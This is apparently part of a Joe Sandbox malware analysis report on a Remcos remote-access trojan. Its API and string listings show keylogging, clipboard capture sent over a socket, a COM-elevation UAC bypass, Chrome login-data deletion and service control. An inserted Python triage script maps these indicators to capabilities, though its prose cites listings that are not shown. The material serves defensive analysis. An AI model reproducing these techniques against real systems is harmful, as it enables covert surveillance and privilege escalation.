                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                              • API String ID: 726551946-3025026198
                                                                                                              • Opcode ID: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                                                                              • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                              • Opcode Fuzzy Hash: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                                                                              • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                              APIs
                                                                                                              • OpenClipboard.USER32 ref: 004159C7
                                                                                                              • EmptyClipboard.USER32 ref: 004159D5
                                                                                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                              • CloseClipboard.USER32 ref: 00415A5A
                                                                                                              • OpenClipboard.USER32 ref: 00415A61
                                                                                                              • GetClipboardData.USER32 ref: 00415A71
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                              • CloseClipboard.USER32 ref: 00415A89
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3520204547-0
                                                                                                              • Opcode ID: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                                                                              • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                                              • Opcode Fuzzy Hash: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                                                                              • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0$1$2$3$4$5$6$7
                                                                                                              • API String ID: 0-3177665633
                                                                                                              • Opcode ID: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                                                                              • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                                              • Opcode Fuzzy Hash: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                                                                              • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                              • String ID: 8[G
                                                                                                              • API String ID: 1888522110-1691237782
                                                                                                              • Opcode ID: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                                                                              • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                                              • Opcode Fuzzy Hash: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                                                                              • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                                              APIs
                                                                                                              • _wcslen.LIBCMT ref: 00406788
                                                                                                              • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Object_wcslen
                                                                                                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                              • API String ID: 240030777-3166923314
                                                                                                              • Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                                                                              • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                                              • Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                                                                              • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
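The function listings above (the Firefox profile sweep over logins.json / key3.db / cookies.sqlite, the watchdog strings, the clipboard read followed by send, and the CoGetObject call with the "Elevation:Administrator!new:" moniker and the {3E5FC7F9-9A51-4367-9063-A120244FBEC7} CLSID that the report flags as the CMSTPLUA UAC bypass) are exactly the kind of string and import evidence an analyst maps to capabilities during triage. The script below is an added example, not part of the Joe Sandbox report and not Remcos code: it parses listing lines in the report's own "• API.MODULE(...)" / "• String ID: a$b$c" format and tags capabilities from a hand-written indicator table. The indicator strings and API names are copied from the listings above; the capability tag names, the `INDICATORS` table, the `parse_listing` / `classify` helpers and the `SAMPLE` text (a few lines copied from this report) are this example's own constructions, not a complete Remcos signature.

```python
"""
Triage helper (added example, not from the Joe Sandbox report or Remcos):
map API names and strings recovered from a memory dump to coarse capability
tags. The INDICATORS table is hand-written from this report's listings and
is illustrative only; it is not an exhaustive or authoritative signature.
"""
import re
from typing import Dict, List, Set, Tuple

# Capability -> string indicators and API indicators. Substring matches are
# case-insensitive. A capability fires on any string hit, or when every
# listed API is present (so "clipboard + send" needs all three calls).
INDICATORS: Dict[str, Dict[str, List[str]]] = {
    "uac-bypass-com-elevation": {        # CoGetObject on an elevation moniker
        "strings": ["Elevation:Administrator!new:",
                    "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",  # CMSTPLUA CLSID
                    "ucmAllocateElevatedObject"],
        "apis": ["CoGetObject"],
    },
    "firefox-credential-tamper": {       # profile sweep over login/cookie stores
        "strings": ["\\Mozilla\\Firefox\\Profiles\\", "logins.json",
                    "key3.db", "cookies.sqlite"],
        "apis": ["FindFirstFileA", "FindNextFileA"],
    },
    "watchdog-persistence": {            # watchdog restarts the implant
        "strings": ["Watchdog module activated",
                    "Remcos restarted by watchdog", "rmclient.exe"],
        "apis": [],
    },
    "clipboard-capture-exfil": {         # clipboard read then socket send
        "strings": [],
        "apis": ["OpenClipboard", "GetClipboardData", "send"],
    },
    "process-injection-ie": {            # snapshot walk looking for IE hosts
        "strings": ["ieinstal.exe", "ielowutil.exe"],
        "apis": ["CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"],
    },
}

# "Name.MODULE" as printed by the report, with or without an argument list.
API_RE = re.compile(
    r"\b([A-Za-z_]\w*)\.(?:KERNEL32|USER32|ADVAPI32|OLE32|WS2_32|LIBCMT)\b")


def parse_listing(text: str) -> Tuple[List[str], List[str]]:
    """Split report listing lines into (strings, api_names).

    String ID lines are '$'-separated; empty fields (from '$$') are dropped.
    Every other line is scanned for API.MODULE tokens, which also covers the
    indented 'Part of subcall function ...' lines.
    """
    strings: List[str] = []
    apis: List[str] = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if line.startswith("String ID:"):
            body = line[len("String ID:"):].strip()
            strings.extend(s for s in body.split("$") if s)
        else:
            apis.extend(API_RE.findall(line))
    return strings, apis


def classify(strings: List[str], apis: List[str]) -> Dict[str, Set[str]]:
    """Return {capability: matched indicators} for each capability that fires."""
    lowered = [s.lower() for s in strings]
    api_set = {a.lower() for a in apis}
    result: Dict[str, Set[str]] = {}
    for cap, ind in INDICATORS.items():
        str_hits = {i for i in ind["strings"]
                    if any(i.lower() in s for s in lowered)}
        api_hits = {a for a in ind["apis"] if a.lower() in api_set}
        all_apis = bool(ind["apis"]) and len(api_hits) == len(ind["apis"])
        if str_hits or all_apis:
            result[cap] = str_hits | api_hits
    return result


# Constructed sample: a handful of lines copied from the listings in this
# report (UAC moniker, Firefox sweep, clipboard + send, one CRT locale call).
SAMPLE = """\
• CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
• FindFirstFileA.KERNEL32(00000000,?,00000000,\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\), ref: 0040B3B4
• FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
• String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\$\\key3.db$\\logins.json
• OpenClipboard.USER32 ref: 00415A61
• GetClipboardData.USER32 ref: 00415A71
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
"""


def triage(text: str) -> Dict[str, Set[str]]:
    """Parse a listing and return the fired capabilities with their evidence."""
    strings, apis = parse_listing(text)
    return classify(strings, apis)


if __name__ == "__main__":
    for cap, evidence in sorted(triage(SAMPLE).items()):
        print(f"{cap}: {sorted(evidence)}")
```

Run against the sample it reports the UAC elevation moniker, the Firefox credential sweep (without cookies.sqlite, which is in a different function) and the clipboard capture, while the watchdog and IE injection tags stay quiet because their evidence is not in the sample. Feeding it the full set of listings for the CasPol.jbxd dump would light up the remaining tags; the point of requiring every API for API-only rules is that a lone `send` or `OpenClipboard` is normal in benign code and should not fire by itself.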
                                                                                                              APIs
                                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                                              • GetLastError.KERNEL32 ref: 00419935
                                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3587775597-0
                                                                                                              • Opcode ID: 34920957428d69c8760f99d8606d88bdea0f5fd358a953c5030324d0b209bf69
                                                                                                              • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                                              • Opcode Fuzzy Hash: 34920957428d69c8760f99d8606d88bdea0f5fd358a953c5030324d0b209bf69
                                                                                                              • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                              • String ID: <D$<D$<D
                                                                                                              • API String ID: 745075371-3495170934
                                                                                                              • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                              • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                              • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                              • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B529
                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B536
                                                                                                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B570
                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B583
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 2341273852-0
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041B633
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID: File$Find$CreateFirstNext
                                                                                                              • String ID: @CG$XCG$`HG$`HG$>G
                                                                                                              • API String ID: 341183262-3780268858
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                              • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                              • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                              • GetMessageA.USER32 ref: 00409A6B
                                                                                                              • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                              • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                              Strings
                                                                                                              • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                              • String ID: Keylogger initialization failure: error
                                                                                                              • API String ID: 3219506041-952744263
                                                                                                              APIs
                                                                                                              • RegCreateKeyExW.ADVAPI32(00000000), ref: 0041301A
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00413026
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004131ED
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                              • API String ID: 2127411465-314212984
                                                                                                              APIs
                                                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                                                                                • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32 ref: 004124F5
                                                                                                                • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                              • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                              • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                              • API String ID: 2281282204-3981147832
                                                                                                              APIs
                                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                              • GetLastError.KERNEL32 ref: 0040B261
                                                                                                              Strings
                                                                                                              • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                              • UserProfile, xrefs: 0040B227
                                                                                                              • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID: DeleteErrorFileLast
                                                                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                              • API String ID: 2018770650-1062637481
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                              • GetLastError.KERNEL32 ref: 00416B02
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                              • API String ID: 3534403312-3733053543
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                                • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                                                • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                                • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                                                                                • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                                                                                • Part of subcall function 004047EB: CloseHandle.KERNELBASE(?), ref: 00404811
                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                              • String ID:
                                                                                                              • API String ID: 4043647387-0
                                                                                                              APIs
                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                              • String ID:
                                                                                                              • API String ID: 276877138-0
                                                                                                              APIs
                                                                                                                • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                              • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 00415970
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                              • String ID: PowrProf.dll$SetSuspendState
                                                                                                              • API String ID: 1589313981-1420736420
                                                                                                              • Opcode ID: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                                                                              • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                                              • Opcode Fuzzy Hash: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                                                                              • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                                              APIs
                                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                                                                              • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InfoLocale
                                                                                                              • String ID: ACP$OCP
                                                                                                              • API String ID: 2299586839-711371036
                                                                                                              • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                              • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                                              • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                              • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                                              APIs
                                                                                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040E183,00000000), ref: 0041A650
                                                                                                              • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                                              • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                                              • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                              • String ID: SETTINGS
                                                                                                              • API String ID: 3473537107-594951305
                                                                                                              • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                              • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
